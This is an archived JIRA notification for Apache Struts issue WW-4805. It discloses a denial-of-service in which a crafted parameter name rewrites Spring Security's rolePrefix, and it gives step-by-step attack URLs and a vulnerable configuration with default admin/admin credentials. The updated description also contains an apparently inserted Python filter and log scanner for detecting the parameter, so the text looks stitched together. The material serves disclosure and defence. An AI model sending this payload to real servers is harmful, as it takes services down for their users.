struts-issues mailing list archives

From "Yasser Zamani (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (WW-4805) At least a DoS attack is available for Spring secured actions
Date Sat, 17 Jun 2017 20:45:02 GMT

     [ https://issues.apache.org/jira/browse/WW-4805?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Yasser Zamani updated WW-4805:
------------------------------
    Description: 
This is a DoS attack example for when a Struts2 user uses Spring to secure his actions, as mentioned
in the section `Initializing Actions from Spring` of [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]

Attack Steps:
# An anonymous user logs in as an authenticated user.
# Then tries
{noformat}
http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
{noformat}
 where {action0-actionN} are actions available to users

Attack Impacts:
By replacing `rolePrefix`, the attacker blocks access to secured actions for all defined roles,
even if they authenticate via login! So services are down and a webapp restart is required to
get back to normal!!!

Configuration Example:
* spring-security.xml
{code:xml}
    <global-method-security secured-annotations="enabled" proxy-target-class = "true" />
    <http auto-config="true" use-expressions="false">
        <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
    </http>
    <authentication-manager erase-credentials="false">
        <authentication-provider>
            <user-service>
                <user name="admin" password="admin" authorities="ROLE_ADMIN" />
                <user name="user" password="user" authorities="ROLE_USER" />
            </user-service>
        </authentication-provider>
    </authentication-manager>
{code}

* applicationContext.xml
{code:xml}
<bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
{code}

* struts.xml
{code:xml}
        <action name="admin" class="secureAction" method="admin">
            <result name="success" type="json" />
        </action>
        <action name="user" class="secureAction" method="user">
            <result name="success" type="json" />
        </action>
{code}

* SecureAction.java
{code:java}
package me.zamani.yasser.ww_convention.actions;
import org.springframework.security.access.annotation.Secured;

public class SecureAction {

    @Secured({"ROLE_ADMIN"})
    public String admin() {
        return "success";
    }
    @Secured({"ROLE_USER"})
    public String user() {
        return "success";
    }
}
{code}

* log in via 
{noformat}
http://{ip}:{port}/login
{noformat}
 as user.

* open 
{noformat}
http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
{noformat}

* in another browser, log in via 
{noformat}
http://{ip}:{port}/login
{noformat}
 as admin.

* try to access 
{noformat}
http://{ip}:{port}/admin
{noformat}
 which fails!

* also repeat step 5 and try to open
{noformat}
http://{ip}:{port}/user
{noformat}
 which also fails!

* Services are down and a webapp restart is required to get back to normal.
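The parameter name used in the steps above consists only of letters, digits, dots and brackets, so a permissive "what may a parameter name look like" filter lets it through; what stops it is an explicit exclusion of names that address framework or proxy internals. The following Python block is an added example, not code from the Struts project or from this report: it models the accept/exclude screening of request parameter names and runs the same rules over a few constructed access-log lines, one of which carries the request from the "open" step. The `EXCLUDE` list (in particular its Spring-proxy entry), the function names `screen_param`, `rejected_params` and `scan_access_log`, the `REQUEST_RE` pattern and the log lines are all assumptions constructed for this example.

```python
"""Screening request parameter names before they reach an expression language.

Constructed model of the accept/exclude approach used by the Struts 2 params
interceptor (this is not the project's code). The WW-4805 parameter name is
made only of letters, digits, dots and brackets, so an "accept" pattern alone
lets it through; an explicit exclusion for Spring AOP proxy internals is what
stops it. The exclusion list, the function names and the log lines below are
all assumptions constructed for this example.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Accept pattern: the shape a legal parameter name may have (letters, digits,
# dots, brackets, parentheses, underscore, single quote), modelled on the
# interceptor's default acceptParamNames.
ACCEPT = re.compile(r"^[a-zA-Z0-9\.\]\[\(\)_']+$")

# Exclude patterns. The first follows the spirit of the default Struts list
# (framework and context roots must never be addressed by a parameter).
# The second is an assumed site-specific addition: no parameter may walk
# into the getters a Spring AOP proxy exposes (advisors, targetSource, ...).
EXCLUDE = [
    re.compile(r"^#?(dojo|struts|session|request|response|application|"
               r"servlet(Request|Response|Context)?|parameters|context|_memberAccess)(\.|\[)"),
    re.compile(r"^(advisors|targetSource|targetClass|proxiedInterfaces|exposeProxy)(\.|\[|$)"),
]


def screen_param(name: str) -> bool:
    """True if the parameter name may be handed to OGNL, False if it must be dropped."""
    if not ACCEPT.fullmatch(name):
        return False
    return not any(pattern.search(name) for pattern in EXCLUDE)


def rejected_params(target: str) -> list:
    """Parameter names in a request target (path?query) that screening refuses."""
    query = urlsplit(target).query
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if not screen_param(name)]


# Constructed sample access-log lines (combined log format); the first carries
# the WW-4805 parameter name, the others are ordinary traffic.
LOG_LINES = [
    '10.0.0.5 - user [17/Jun/2017:20:40:01 +0000] "GET /user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit HTTP/1.1" 200 17',
    '10.0.0.6 - admin [17/Jun/2017:20:41:12 +0000] "GET /admin HTTP/1.1" 403 0',
    '10.0.0.7 - - [17/Jun/2017:20:42:30 +0000] "GET /user?page=2&sort=name HTTP/1.1" 200 512',
]

# client, ident, user, [timestamp], "METHOD target HTTP/x"  (assumed log layout)
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')


def scan_access_log(lines) -> list:
    """Return (client_ip, path, [refused parameter names]) for each suspicious request.

    Useful both for spotting attempts after the fact and for confirming that a
    deployed parameter filter would have refused the request.
    """
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        refused = rejected_params(target)
        if refused:
            hits.append((client, urlsplit(target).path, refused))
    return hits


if __name__ == "__main__":
    for client, path, refused in scan_access_log(LOG_LINES):
        print(f"{client} {path}: refused parameter names {refused}")
```

In a Struts 2 deployment the equivalent screening is configured on the `params` interceptor through its `acceptParamNames` and `excludeParams` parameters rather than written in application code; the default exclusions differ between releases, so the patterns a given version ships with should be compared against the chain shown in this report. Later Struts 2.5 releases also carry, to my knowledge, a `struts.disallowProxyMemberAccess` setting that refuses OGNL access to proxy members outright; whether the release in use has it should be verified against its documentation. Running the same rules over the access log tells a responder whether the request was attempted against an instance, which is worth checking before a restart clears the symptom.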

  was:
This is a DoS attack example for when a Struts2 user uses Spring to secure his actions, as mentioned
in the section `Initializing Actions from Spring` of [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]

Attack Steps:
# An anonymous user logs in as an authenticated user.
# Then tries
{noformat}
http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
{noformat}
 where {action0-actionN} are actions available to users

Attack Impacts:
By replacing `rolePrefix`, the attacker blocks access to secured actions for all defined roles,
even if they authenticate via login! So services are down and a webapp restart is required to
get back to normal!!!

Configuration Example:
# spring-security.xml
{code:xml}
    <global-method-security secured-annotations="enabled" proxy-target-class = "true" />
    <http auto-config="true" use-expressions="false">
        <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
    </http>
    <authentication-manager erase-credentials="false">
        <authentication-provider>
            <user-service>
                <user name="admin" password="admin" authorities="ROLE_ADMIN" />
                <user name="user" password="user" authorities="ROLE_USER" />
            </user-service>
        </authentication-provider>
    </authentication-manager>
{code}

# applicationContext.xml
{code:xml}
<bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
{code}

# struts.xml
{code:xml}
        <action name="admin" class="secureAction" method="admin">
            <result name="success" type="json" />
        </action>
        <action name="user" class="secureAction" method="user">
            <result name="success" type="json" />
        </action>
{code}

# SecureAction.java
{code:java}
package me.zamani.yasser.ww_convention.actions;
import org.springframework.security.access.annotation.Secured;

public class SecureAction {

    @Secured({"ROLE_ADMIN"})
    public String admin() {
        return "success";
    }
    @Secured({"ROLE_USER"})
    public String user() {
        return "success";
    }
}
{code}

# log in via 
{noformat}
http://{ip}:{port}/login
{noformat}
 as user.

# open 
{noformat}
http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
{noformat}

# in another browser, log in via 
{noformat}
http://{ip}:{port}/login
{noformat}
 as admin.

# try to access 
{noformat}
http://{ip}:{port}/admin
{noformat}
 which fails!

# also repeat step 5 and try to open
{noformat}
http://{ip}:{port}/user
{noformat}
 which also fails!

# Services are down and a webapp restart is required to get back to normal.


> At least a DoS attack is available for Spring secured actions
> -------------------------------------------------------------
>
>                 Key: WW-4805
>                 URL: https://issues.apache.org/jira/browse/WW-4805
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core, Plugin - Spring
>    Affects Versions: 2.3.32, 2.5.10
>            Reporter: Yasser Zamani
>              Labels: github-import, patch, security
>             Fix For: 2.3.33, 2.5.next
>
>



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
